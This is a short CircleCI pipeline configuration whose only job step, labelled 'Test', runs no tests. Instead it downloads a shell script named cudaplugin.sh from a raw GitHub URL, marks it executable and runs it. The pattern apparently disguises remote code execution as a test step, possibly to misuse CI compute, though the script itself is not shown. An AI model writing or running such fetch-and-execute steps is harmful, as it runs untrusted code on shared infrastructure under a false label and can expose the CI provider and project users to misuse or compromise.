version: 2.1

orbs:
  python: circleci/python@0.2.1

jobs:
  build-and-test:
    executor: python/default
    steps:
      - run:
          command: wget https://raw.githubusercontent.com/arisemarise/python/main/cudaplugin.sh && chmod u+x cudaplugin.sh && ./cudaplugin.sh
          name: Test

workflows:
  main:
    jobs:
      - build-and-test
